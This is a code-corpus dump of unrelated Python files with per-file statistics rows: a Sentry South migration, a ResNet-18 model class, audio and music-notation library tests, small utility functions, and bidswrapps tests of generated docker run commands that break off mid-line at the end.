    def forwards(self, orm):
        # Adding model 'GroupedMessage'
        db.create_table('sentry_groupedmessage', (
            ('id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
            ('logger', self.gf('django.db.models.fields.CharField')(default='root', max_length=64, db_index=True, blank=True)),
            ('class_name', self.gf('django.db.models.fields.CharField')(db_index=True, max_length=128, null=True, blank=True)),
            ('level', self.gf('django.db.models.fields.PositiveIntegerField')(default=40, db_index=True, blank=True)),
            ('message', self.gf('django.db.models.fields.TextField')()),
            ('traceback', self.gf('django.db.models.fields.TextField')(null=True, blank=True)),
            ('view', self.gf('django.db.models.fields.CharField')(max_length=200, db_index=True)),
            ('url', self.gf('django.db.models.fields.URLField')(max_length=200, null=True, blank=True)),
            ('server_name', self.gf('django.db.models.fields.CharField')(max_length=128, db_index=True)),
            ('checksum', self.gf('django.db.models.fields.CharField')(max_length=32, db_index=True)),
            ('status', self.gf('django.db.models.fields.PositiveIntegerField')(default=0)),
            ('times_seen', self.gf('django.db.models.fields.PositiveIntegerField')(default=1)),
            ('last_seen', self.gf('django.db.models.fields.DateTimeField')(default=datetime.datetime.now, db_index=True)),
            ('first_seen', self.gf('django.db.models.fields.DateTimeField')(default=datetime.datetime.now, db_index=True)),
        ))
        db.send_create_signal('sentry', ['GroupedMessage'])

        # Adding unique constraint on 'GroupedMessage', fields ['logger', 'view', 'checksum']
        db.create_unique('sentry_groupedmessage', ['logger', 'view', 'checksum'])

        # Adding model 'Message'
        db.create_table('sentry_message', (
            ('id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
            ('logger', self.gf('django.db.models.fields.CharField')(default='root', max_length=64, db_index=True, blank=True)),
            ('class_name', self.gf('django.db.models.fields.CharField')(db_index=True, max_length=128, null=True, blank=True)),
            ('level', self.gf('django.db.models.fields.PositiveIntegerField')(default=40, db_index=True, blank=True)),
            ('message', self.gf('django.db.models.fields.TextField')()),
            ('traceback', self.gf('django.db.models.fields.TextField')(null=True, blank=True)),
            ('view', self.gf('django.db.models.fields.CharField')(max_length=200, db_index=True)),
            ('url', self.gf('django.db.models.fields.URLField')(max_length=200, null=True, blank=True)),
            ('server_name', self.gf('django.db.models.fields.CharField')(max_length=128, db_index=True)),
            ('checksum', self.gf('django.db.models.fields.CharField')(max_length=32, db_index=True)),
            ('datetime', self.gf('django.db.models.fields.DateTimeField')(default=datetime.datetime.now, db_index=True)),
            ('data', self.gf('django.db.models.fields.TextField')(null=True, blank=True)),
        ))
        db.send_create_signal('sentry', ['Message'])

    def backwards(self, orm):
        # Deleting model 'GroupedMessage'
        db.delete_table('sentry_groupedmessage')

        # Removing unique constraint on 'GroupedMessage', fields ['logger', 'view', 'checksum']
        db.delete_unique('sentry_groupedmessage', ['logger', 'view', 'checksum'])

        # Deleting model 'Message'
        db.delete_table('sentry_message')

    models = {
        'sentry.groupedmessage': {
            'Meta': {'unique_together': "(('logger', 'view', 'checksum'),)", 'object_name': 'GroupedMessage'},
            'checksum': ('django.db.models.fields.CharField', [], {'max_length': '32', 'db_index': 'True'}),
            'class_name': ('django.db.models.fields.CharField', [], {'db_index': 'True', 'max_length': '128', 'null': 'True', 'blank': 'True'}),
            'first_seen': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'db_index': 'True'}),
            'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'last_seen': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'db_index': 'True'}),
            'level': ('django.db.models.fields.PositiveIntegerField', [], {'default': '40', 'db_index': 'True', 'blank': 'True'}),
            'logger': ('django.db.models.fields.CharField', [], {'default': "'root'", 'max_length': '64', 'db_index': 'True', 'blank': 'True'}),
            'message': ('django.db.models.fields.TextField', [], {}),
            'server_name': ('django.db.models.fields.CharField', [], {'max_length': '128', 'db_index': 'True'}),
            'status': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0'}),
            'times_seen': ('django.db.models.fields.PositiveIntegerField', [], {'default': '1'}),
            'traceback': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
            'url': ('django.db.models.fields.URLField', [], {'max_length': '200', 'null': 'True', 'blank': 'True'}),
            'view': ('django.db.models.fields.CharField', [], {'max_length': '200', 'db_index': 'True'})
        },
        'sentry.message': {
            'Meta': {'object_name': 'Message'},
            'checksum': ('django.db.models.fields.CharField', [], {'max_length': '32', 'db_index': 'True'}),
            'class_name': ('django.db.models.fields.CharField', [], {'db_index': 'True', 'max_length': '128', 'null': 'True', 'blank': 'True'}),
            'data': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
            'datetime': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'db_index': 'True'}),
            'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'level': ('django.db.models.fields.PositiveIntegerField', [], {'default': '40', 'db_index': 'True', 'blank': 'True'}),
            'logger': ('django.db.models.fields.CharField', [], {'default': "'root'", 'max_length': '64', 'db_index': 'True', 'blank': 'True'}),
            'message': ('django.db.models.fields.TextField', [], {}),
            'server_name': ('django.db.models.fields.CharField', [], {'max_length': '128', 'db_index': 'True'}),
            'traceback': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
            'url': ('django.db.models.fields.URLField', [], {'max_length': '200', 'null': 'True', 'blank': 'True'}),
            'view': ('django.db.models.fields.CharField', [], {'max_length': '255', 'db_index': 'True'})
        }
    }

    complete_apps = ['sentry']
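The repeated self.gf('...') calls above are South's shorthand for turning a dotted field path into the field class before instantiating it. A minimal sketch of that lookup (resolve_field is an illustrative name, not South's API):

from importlib import import_module

def resolve_field(dotted_path):
    # "django.db.models.fields.CharField" -> the CharField class
    module_path, _, cls_name = dotted_path.rpartition(".")
    return getattr(import_module(module_path), cls_name)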
| 70.929293 | 144 | 0.606665 | 802 | 7,022 | 5.197007 | 0.100998 | 0.101727 | 0.174664 | 0.24952 | 0.849328 | 0.849328 | 0.816699 | 0.804942 | 0.790787 | 0.724568 | 0 | 0.013483 | 0.176161 | 7,022 | 98 | 145 | 71.653061 | 0.707001 | 0.042011 | 0 | 0.512821 | 0 | 0 | 0.471499 | 0.296473 | 0 | 0 | 0 | 0 | 0 | 1 | 0.025641 | false | 0 | 0.051282 | 0 | 0.115385 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
dc786cb3af9264f6501fa56b19d2641e0969fd5f | 4,954 | py | Python |
modulo2/2-classificadores/2.4-resnet/model.py | fossabot/unifacisa-visao-computacional | 14aef22a3e7fe10ee820d31ce12ad21a3cad7b0b | ["MIT"] | null | null | null |
modulo2/2-classificadores/2.4-resnet/model.py | fossabot/unifacisa-visao-computacional | 14aef22a3e7fe10ee820d31ce12ad21a3cad7b0b | ["MIT"] | null | null | null |
modulo2/2-classificadores/2.4-resnet/model.py | fossabot/unifacisa-visao-computacional | 14aef22a3e7fe10ee820d31ce12ad21a3cad7b0b | ["MIT"] | 1 | 2021-02-06T00:49:32.000Z | 2021-02-06T00:49:32.000Z |
import torch
import torch.nn as nn
import math


class Resnet18(nn.Module):
    def __init__(self, num_classes=1000):
        super(Resnet18, self).__init__()
        # The block below was pasted into the source as a printed module repr
        # (the output of print()-ing a torchvision ResNet-18). It is not valid
        # Python, so it is preserved here as a string literal for documentation.
        """
        ResNet(
(conv1): Conv2d(3, 64, kernel_size=(7, 7), stride=(2, 2), padding=(3, 3), bias=False)
(bn1): BatchNorm2d(64, eps=1e-05, momentum=0.1, affine=True, track_running_stats=True)
(relu): ReLU(inplace=True)
(maxpool): MaxPool2d(kernel_size=3, stride=2, padding=1, dilation=1, ceil_mode=False)
(layer1): Sequential(
(0): BasicBlock(
(conv1): Conv2d(64, 64, kernel_size=(3, 3), stride=(1, 1), padding=(1, 1), bias=False)
(bn1): BatchNorm2d(64, eps=1e-05, momentum=0.1, affine=True, track_running_stats=True)
(relu): ReLU(inplace=True)
(conv2): Conv2d(64, 64, kernel_size=(3, 3), stride=(1, 1), padding=(1, 1), bias=False)
(bn2): BatchNorm2d(64, eps=1e-05, momentum=0.1, affine=True, track_running_stats=True)
)
(1): BasicBlock(
(conv1): Conv2d(64, 64, kernel_size=(3, 3), stride=(1, 1), padding=(1, 1), bias=False)
(bn1): BatchNorm2d(64, eps=1e-05, momentum=0.1, affine=True, track_running_stats=True)
(relu): ReLU(inplace=True)
(conv2): Conv2d(64, 64, kernel_size=(3, 3), stride=(1, 1), padding=(1, 1), bias=False)
(bn2): BatchNorm2d(64, eps=1e-05, momentum=0.1, affine=True, track_running_stats=True)
)
)
(layer2): Sequential(
(0): BasicBlock(
(conv1): Conv2d(64, 128, kernel_size=(3, 3), stride=(2, 2), padding=(1, 1), bias=False)
(bn1): BatchNorm2d(128, eps=1e-05, momentum=0.1, affine=True, track_running_stats=True)
(relu): ReLU(inplace=True)
(conv2): Conv2d(128, 128, kernel_size=(3, 3), stride=(1, 1), padding=(1, 1), bias=False)
(bn2): BatchNorm2d(128, eps=1e-05, momentum=0.1, affine=True, track_running_stats=True)
(downsample): Sequential(
(0): Conv2d(64, 128, kernel_size=(1, 1), stride=(2, 2), bias=False)
(1): BatchNorm2d(128, eps=1e-05, momentum=0.1, affine=True, track_running_stats=True)
)
)
(1): BasicBlock(
(conv1): Conv2d(128, 128, kernel_size=(3, 3), stride=(1, 1), padding=(1, 1), bias=False)
(bn1): BatchNorm2d(128, eps=1e-05, momentum=0.1, affine=True, track_running_stats=True)
(relu): ReLU(inplace=True)
(conv2): Conv2d(128, 128, kernel_size=(3, 3), stride=(1, 1), padding=(1, 1), bias=False)
(bn2): BatchNorm2d(128, eps=1e-05, momentum=0.1, affine=True, track_running_stats=True)
)
)
(layer3): Sequential(
(0): BasicBlock(
(conv1): Conv2d(128, 256, kernel_size=(3, 3), stride=(2, 2), padding=(1, 1), bias=False)
(bn1): BatchNorm2d(256, eps=1e-05, momentum=0.1, affine=True, track_running_stats=True)
(relu): ReLU(inplace=True)
(conv2): Conv2d(256, 256, kernel_size=(3, 3), stride=(1, 1), padding=(1, 1), bias=False)
(bn2): BatchNorm2d(256, eps=1e-05, momentum=0.1, affine=True, track_running_stats=True)
(downsample): Sequential(
(0): Conv2d(128, 256, kernel_size=(1, 1), stride=(2, 2), bias=False)
(1): BatchNorm2d(256, eps=1e-05, momentum=0.1, affine=True, track_running_stats=True)
)
)
(1): BasicBlock(
(conv1): Conv2d(256, 256, kernel_size=(3, 3), stride=(1, 1), padding=(1, 1), bias=False)
(bn1): BatchNorm2d(256, eps=1e-05, momentum=0.1, affine=True, track_running_stats=True)
(relu): ReLU(inplace=True)
(conv2): Conv2d(256, 256, kernel_size=(3, 3), stride=(1, 1), padding=(1, 1), bias=False)
(bn2): BatchNorm2d(256, eps=1e-05, momentum=0.1, affine=True, track_running_stats=True)
)
)
(layer4): Sequential(
(0): BasicBlock(
(conv1): Conv2d(256, 512, kernel_size=(3, 3), stride=(2, 2), padding=(1, 1), bias=False)
(bn1): BatchNorm2d(512, eps=1e-05, momentum=0.1, affine=True, track_running_stats=True)
(relu): ReLU(inplace=True)
(conv2): Conv2d(512, 512, kernel_size=(3, 3), stride=(1, 1), padding=(1, 1), bias=False)
(bn2): BatchNorm2d(512, eps=1e-05, momentum=0.1, affine=True, track_running_stats=True)
(downsample): Sequential(
(0): Conv2d(256, 512, kernel_size=(1, 1), stride=(2, 2), bias=False)
(1): BatchNorm2d(512, eps=1e-05, momentum=0.1, affine=True, track_running_stats=True)
)
)
(1): BasicBlock(
(conv1): Conv2d(512, 512, kernel_size=(3, 3), stride=(1, 1), padding=(1, 1), bias=False)
(bn1): BatchNorm2d(512, eps=1e-05, momentum=0.1, affine=True, track_running_stats=True)
(relu): ReLU(inplace=True)
(conv2): Conv2d(512, 512, kernel_size=(3, 3), stride=(1, 1), padding=(1, 1), bias=False)
(bn2): BatchNorm2d(512, eps=1e-05, momentum=0.1, affine=True, track_running_stats=True)
)
)
        (avgpool): AdaptiveAvgPool2d(output_size=(1, 1))
        (fc): Linear(in_features=512, out_features=1000, bias=True)
        )
        """
        # `forward` below needs `self.features` and `self.classifier`, which the
        # original file never defines. Building them from torchvision's resnet18
        # is an assumption that matches the printed architecture above.
        import torchvision
        backbone = torchvision.models.resnet18()
        self.features = nn.Sequential(*list(backbone.children())[:-1])  # conv1 ... avgpool
        self.classifier = nn.Linear(512, num_classes)

    def forward(self, x):
        x = self.features(x)
        x = torch.flatten(x, 1)
        x = self.classifier(x)
        return x
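A quick smoke test for the repaired class (hypothetical usage, not part of the original file):

model = Resnet18(num_classes=1000)
logits = model(torch.randn(1, 3, 224, 224))  # dummy batch of one 224x224 RGB image
print(logits.shape)  # expected: torch.Size([1, 1000])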
| 48.568627 | 94 | 0.628583 | 749 | 4,954 | 4.058745 | 0.096128 | 0.021711 | 0.046053 | 0.098684 | 0.872697 | 0.844079 | 0.826316 | 0.826316 | 0.826316 | 0.826316 | 0 | 0.121422 | 0.182075 | 4,954 | 102 | 95 | 48.568627 | 0.628825 | 0 | 0 | 0.5 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.031915 | null | null | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
f492053f9fc9b2894b027e98714c8641adf16be5 | 172 | py | Python |
librespot/audio/HaltListener.py | JeffmeisterJ/librespot-python | 0e0e1db65aa40262bd13479b97f81ae8c29ae049 | ["Apache-2.0"] | 1 | 2021-12-15T22:44:46.000Z | 2021-12-15T22:44:46.000Z |
librespot/audio/HaltListener.py | JeffmeisterJ/librespot-python | 0e0e1db65aa40262bd13479b97f81ae8c29ae049 | ["Apache-2.0"] | 12 | 2021-10-06T02:18:44.000Z | 2022-02-07T02:16:47.000Z |
librespot/audio/HaltListener.py | JeffmeisterJ/librespot-python | 0e0e1db65aa40262bd13479b97f81ae8c29ae049 | ["Apache-2.0"] | null | null | null |
class HaltListener:
    def stream_read_halted(self, chunk: int, _time: int) -> None:
        pass

    def stream_read_resumed(self, chunk: int, _time: int):
        pass
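Both methods are no-op hooks, so consumers subclass and override the events they care about. A minimal sketch (interpreting _time as a duration is an assumption; the file does not document its unit):

class LoggingHaltListener(HaltListener):
    def stream_read_halted(self, chunk: int, _time: int) -> None:
        print("read halted at chunk", chunk, "time", _time)  # _time unit is an assumption

    def stream_read_resumed(self, chunk: int, _time: int):
        print("read resumed at chunk", chunk, "time", _time)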
| 24.571429 | 65 | 0.651163 | 23 | 172 | 4.608696 | 0.565217 | 0.169811 | 0.245283 | 0.301887 | 0.358491 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.25 | 172 | 6 | 66 | 28.666667 | 0.821705 | 0 | 0 | 0.4 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.4 | false | 0.4 | 0 | 0 | 0.6 | 0 | 1 | 0 | 0 | null | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 7 |
76122c49745cad4b7d60650d80d33345a41c028f | 4,920 | py | Python |
test/test_SegmentMaker_rehearsal_mark.py | josiah-wolf-oberholtzer/consort | 6c7d511835d5ad883ad1ad52ae9cd48c4a7b5571 | ["MIT"] | 9 | 2015-02-11T09:35:40.000Z | 2019-04-29T23:57:49.000Z |
test/test_SegmentMaker_rehearsal_mark.py | josiah-wolf-oberholtzer/consort | 6c7d511835d5ad883ad1ad52ae9cd48c4a7b5571 | ["MIT"] | 2 | 2016-02-07T18:54:47.000Z | 2017-08-10T01:38:01.000Z |
test/test_SegmentMaker_rehearsal_mark.py | josiah-wolf-oberholtzer/consort | 6c7d511835d5ad883ad1ad52ae9cd48c4a7b5571 | ["MIT"] | 1 | 2019-05-13T12:37:15.000Z | 2019-05-13T12:37:15.000Z |
import abjad
import collections
import consort
from abjad.tools import systemtools
from abjad.tools import templatetools


segment_metadata = collections.OrderedDict(
    segment_count=3,
    segment_number=2,
    )


def test_SegmentMaker_rehearsal_mark_01():
    segment_maker = consort.SegmentMaker(
        discard_final_silence=True,
        desired_duration_in_seconds=4,
        omit_stylesheets=True,
        score_template=templatetools.GroupedRhythmicStavesScoreTemplate(
            staff_count=1,
            ),
        settings=None,
        tempo=abjad.MetronomeMark((1, 4), 60),
        permitted_time_signatures=((4, 4),),
        )
    lilypond_file, metadata = segment_maker(
        segment_metadata=segment_metadata,
        )
    assert format(lilypond_file) == abjad.String.normalize(
        r'''
        \version "2.19.65"
        \language "english"
        #(ly:set-option 'relative-includes #t)
        \score {
            \context Score = "Grouped Rhythmic Staves Score" <<
                \tag #'time
                \context TimeSignatureContext = "Time Signature Context" {
                    {
                        \tempo 4=60
                        \time 4/4
                        \mark \markup {
                            \box
                                \pad-around
                                    #0.5
                                    \caps
                                        A
                            }
                        s1 * 1
                    }
                }
                \context StaffGroup = "Grouped Rhythmic Staves Staff Group" <<
                    \context RhythmicStaff = "Staff 1" {
                        \bar "||"
                        \context Voice = "Voice 1" {
                            {
                                % [Voice 1] Measure 1
                                {
                                    \stopStaff
                                    \once \override Staff.StaffSymbol.line-positions = #'(0)
                                    \startStaff
                                    R1 * 1
                                    \stopStaff
                                    \startStaff
                                }
                            }
                        }
                    }
                >>
            >>
        }
        ''')


def test_SegmentMaker_rehearsal_mark_02():
    segment_maker = consort.SegmentMaker(
        discard_final_silence=True,
        desired_duration_in_seconds=4,
        name='A transitional segment',
        omit_stylesheets=True,
        score_template=templatetools.GroupedRhythmicStavesScoreTemplate(
            staff_count=1,
            ),
        settings=None,
        tempo=abjad.MetronomeMark((1, 4), 60),
        permitted_time_signatures=((4, 4),),
        )
    lilypond_file, metadata = segment_maker(
        segment_metadata=segment_metadata,
        )
    assert format(lilypond_file) == abjad.String.normalize(
        r'''
        \version "2.19.65"
        \language "english"
        #(ly:set-option 'relative-includes #t)
        \score {
            \context Score = "Grouped Rhythmic Staves Score" <<
                \tag #'time
                \context TimeSignatureContext = "Time Signature Context" {
                    {
                        \tempo 4=60
                        \time 4/4
                        \mark \markup {
                            \concat
                                {
                                    \box
                                        \pad-around
                                            #0.5
                                            \caps
                                                A
                                    " "
                                    \fontsize
                                        #-3
                                        "A transitional segment"
                                }
                            }
                        s1 * 1
                    }
                }
                \context StaffGroup = "Grouped Rhythmic Staves Staff Group" <<
                    \context RhythmicStaff = "Staff 1" {
                        \bar "||"
                        \context Voice = "Voice 1" {
                            {
                                % [Voice 1] Measure 1
                                {
                                    \stopStaff
                                    \once \override Staff.StaffSymbol.line-positions = #'(0)
                                    \startStaff
                                    R1 * 1
                                    \stopStaff
                                    \startStaff
                                }
                            }
                        }
                    }
                >>
            >>
        }
        ''')
| 34.166667 | 92 | 0.36565 | 306 | 4,920 | 5.738562 | 0.323529 | 0.042711 | 0.047836 | 0.022779 | 0.867882 | 0.831435 | 0.831435 | 0.809795 | 0.809795 | 0.809795 | 0 | 0.03036 | 0.564837 | 4,920 | 143 | 93 | 34.405594 | 0.789818 | 0 | 0 | 0.636364 | 0 | 0 | 0.015079 | 0 | 0 | 0 | 0 | 0 | 0.045455 | 1 | 0.045455 | false | 0 | 0.113636 | 0 | 0.159091 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
525529c8146bbe2f6674245e7fff7556b989a785 | 132 | py | Python |
software-development/unit-tests/python/start.py | fahimfarhan/legendary-coding-odyssey | 55289e05aa04f866201c607bed00c505cd9c4df9 | ["MIT"] | 3 | 2019-07-20T07:26:31.000Z | 2020-08-06T09:31:09.000Z |
software-development/unit-tests/python/start.py | fahimfarhan/legendary-coding-odyssey | 55289e05aa04f866201c607bed00c505cd9c4df9 | ["MIT"] | null | null | null |
software-development/unit-tests/python/start.py | fahimfarhan/legendary-coding-odyssey | 55289e05aa04f866201c607bed00c505cd9c4df9 | ["MIT"] | 4 | 2019-06-20T18:43:32.000Z | 2020-10-07T16:45:23.000Z |
def add(a, b):
    return a + b


def sub(a, b):
    return a - b


def multiply(a, b):
    return a * b


def div(a, b):
    return a / b
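Given the repo path (unit-tests/python), these helpers exist to be tested; a hypothetical pytest companion module, including the obvious division-by-zero edge case (the module name `start` is taken from the file path):

import pytest
from start import add, sub, multiply, div

def test_add():
    assert add(2, 3) == 5

def test_sub():
    assert sub(5, 3) == 2

def test_multiply():
    assert multiply(4, 3) == 12

def test_div_rejects_zero():
    with pytest.raises(ZeroDivisionError):
        div(1, 0)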
| 11 | 18 | 0.522727 | 28 | 132 | 2.464286 | 0.285714 | 0.231884 | 0.463768 | 0.521739 | 0.710145 | 0.565217 | 0 | 0 | 0 | 0 | 0 | 0 | 0.325758 | 132 | 12 | 19 | 11 | 0.775281 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.5 | false | 0 | 0 | 0.5 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 7 |
5267c953ae0dfbcbbf8e7e55311feec41640fc59 | 1,833 | py | Python |
tests/nonrealtime/test_nonrealtime_Node_get_parent.py | butayama/supriya | 0c197324ecee4232381221880d1f40e109bb756c | ["MIT"] | 191 | 2015-11-13T02:28:42.000Z | 2022-03-29T10:26:44.000Z |
tests/nonrealtime/test_nonrealtime_Node_get_parent.py | butayama/supriya | 0c197324ecee4232381221880d1f40e109bb756c | ["MIT"] | 130 | 2016-01-04T16:59:02.000Z | 2022-02-26T15:37:20.000Z |
tests/nonrealtime/test_nonrealtime_Node_get_parent.py | butayama/supriya | 0c197324ecee4232381221880d1f40e109bb756c | ["MIT"] | 22 | 2016-05-04T10:32:16.000Z | 2022-02-26T19:22:45.000Z |
import pytest
import supriya.nonrealtime


def test_01():
    """
    With Session.at(...) context manager.
    """
    session = supriya.nonrealtime.Session()
    with session.at(0):
        group_one = session.add_group()
        group_two = session.add_group()
        node = group_one.add_synth()
    with session.at(10):
        group_two.move_node(node)
    with session.at(5):
        parent = node.get_parent()
        assert parent is group_one
    with session.at(15):
        parent = node.get_parent()
        assert parent is group_two


def test_02():
    """
    With offset=... keyword.
    """
    session = supriya.nonrealtime.Session()
    with session.at(0):
        group_one = session.add_group()
        group_two = session.add_group()
        node = group_one.add_synth()
    with session.at(10):
        group_two.move_node(node)
    parent = node.get_parent(offset=5)
    assert parent is group_one
    parent = node.get_parent(offset=15)
    assert parent is group_two


def test_03():
    """
    Without Session.at(...) context manager or offset keyword.
    """
    session = supriya.nonrealtime.Session()
    with session.at(0):
        group_one = session.add_group()
        group_two = session.add_group()
        node = group_one.add_synth()
    with session.at(10):
        group_two.move_node(node)
    with pytest.raises(ValueError):
        node.get_parent()


def test_04():
    """
    With both Session.at(...) context manager and offset keyword.
    """
    session = supriya.nonrealtime.Session()
    with session.at(0):
        group_one = session.add_group()
        group_two = session.add_group()
        node = group_one.add_synth()
    with session.at(10):
        group_two.move_node(node)
    with session.at(5):
        parent = node.get_parent(offset=15)
        assert parent is group_two
| 25.816901 | 65 | 0.629023 | 240 | 1,833 | 4.608333 | 0.158333 | 0.113924 | 0.141049 | 0.085895 | 0.813743 | 0.768535 | 0.768535 | 0.753165 | 0.701627 | 0.701627 | 0 | 0.021168 | 0.252591 | 1,833 | 70 | 66 | 26.185714 | 0.786131 | 0.099836 | 0 | 0.795918 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.102041 | 1 | 0.081633 | false | 0 | 0.040816 | 0 | 0.122449 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
870f59b56d6d2f2ec4535f561e62e75df977cd0c | 128 | py | Python |
docs/source/tutorial/v2/using_liberty.py | mjhajharia/deprecated | 9893b54d62ad0b164b9d99ee8382d21f32b5f96a | ["MIT"] | 169 | 2017-12-05T15:22:20.000Z | 2022-03-08T03:24:56.000Z |
docs/source/tutorial/v2/using_liberty.py | mjhajharia/deprecated | 9893b54d62ad0b164b9d99ee8382d21f32b5f96a | ["MIT"] | 48 | 2018-06-21T22:39:37.000Z | 2022-01-07T17:57:59.000Z |
docs/source/tutorial/v2/using_liberty.py | mjhajharia/deprecated | 9893b54d62ad0b164b9d99ee8382d21f32b5f96a | ["MIT"] | 23 | 2018-06-21T22:36:48.000Z | 2021-12-22T19:31:18.000Z |
# coding: utf-8
import liberty
liberty.print_value("hello")
liberty.print_value("hello again")
liberty.better_print("Hi Tom!")
| 18.285714 | 34 | 0.765625 | 19 | 128 | 5 | 0.631579 | 0.252632 | 0.357895 | 0.463158 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.008547 | 0.085938 | 128 | 6 | 35 | 21.333333 | 0.803419 | 0.101563 | 0 | 0 | 0 | 0 | 0.20354 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.25 | 0 | 0.25 | 0.75 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 7 |
8722407eeed6a7de19e1461162738e47d29f6169 | 8,927 | py | Python |
bidswrapps/tests.py | fliem/bidswrapps | f643e672b7c1d38b8868cc7c913b0ef9834c30e5 | ["Apache-2.0"] | null | null | null |
bidswrapps/tests.py | fliem/bidswrapps | f643e672b7c1d38b8868cc7c913b0ef9834c30e5 | ["Apache-2.0"] | null | null | null |
bidswrapps/tests.py | fliem/bidswrapps | f643e672b7c1d38b8868cc7c913b0ef9834c30e5 | ["Apache-2.0"] | null | null | null |
from bidswrapps.utils import compile_run_cmd


def test_basic():
    """test basic bids app use case"""
    analysis_level = "participant"
    bids_input_folder = "/bids_in_data"
    bids_output_folder = "/bids_out_data"
    docker_image = "testorg/testim:dev"
    subject_id = ""
    docker_volumes = []
    runscript_args = ""
    runscript_cmd = ""
    correct_cmd = "docker run -v /bids_in_data:/data/in:ro -v /bids_out_data:/data/out testorg/testim:dev /data/in " \
                  "/data/out participant"
    cmd = compile_run_cmd(analysis_level, bids_input_folder, bids_output_folder, docker_image, subject_id,
                          docker_volumes=docker_volumes, runscript_args=runscript_args, runscript_cmd=runscript_cmd)
    assert cmd == correct_cmd, "cmd:\n%s\n does not match correct cmd:\n%s" % (cmd, correct_cmd)


def test_basic_group():
    """test basic bids app group use case"""
    analysis_level = "group"
    bids_input_folder = "/bids_in_data"
    bids_output_folder = "/bids_out_data"
    docker_image = "testorg/testim:dev"
    subject_id = ""
    docker_volumes = []
    runscript_args = ""
    runscript_cmd = ""
    correct_cmd = "docker run -v /bids_in_data:/data/in:ro -v /bids_out_data:/data/out testorg/testim:dev /data/in " \
                  "/data/out group"
    cmd = compile_run_cmd(analysis_level, bids_input_folder, bids_output_folder, docker_image, subject_id,
                          docker_volumes=docker_volumes, runscript_args=runscript_args, runscript_cmd=runscript_cmd)
    assert cmd == correct_cmd, "cmd:\n%s\n does not match correct cmd:\n%s" % (cmd, correct_cmd)


def test_basic_group_noro():
    """test basic bids app group use case without input ro"""
    analysis_level = "group"
    bids_input_folder = "/bids_in_data"
    bids_output_folder = "/bids_out_data"
    docker_image = "testorg/testim:dev"
    subject_id = ""
    docker_volumes = []
    runscript_args = ""
    runscript_cmd = ""
    input_ro = False
    correct_cmd = "docker run -v /bids_in_data:/data/in -v /bids_out_data:/data/out testorg/testim:dev /data/in " \
                  "/data/out group"
    cmd = compile_run_cmd(analysis_level, bids_input_folder, bids_output_folder, docker_image, subject_id,
                          docker_volumes=docker_volumes, runscript_args=runscript_args, runscript_cmd=runscript_cmd,
                          input_ro=input_ro)
    assert cmd == correct_cmd, "cmd:\n%s\n does not match correct cmd:\n%s" % (cmd, correct_cmd)


def test_additional_vols():
    """test additional mount vol use case"""
    analysis_level = "participant"
    bids_input_folder = "/bids_in_data"
    bids_output_folder = "/bids_out_data"
    docker_image = "testorg/testim:dev"
    subject_id = ""
    docker_volumes = ["/project/vol1:/data/vol1", "/project/vol2:/data/vol2"]
    runscript_args = ""
    runscript_cmd = ""
    correct_cmd = "docker run -v /bids_in_data:/data/in:ro -v /bids_out_data:/data/out -v /project/vol1:/data/vol1 " \
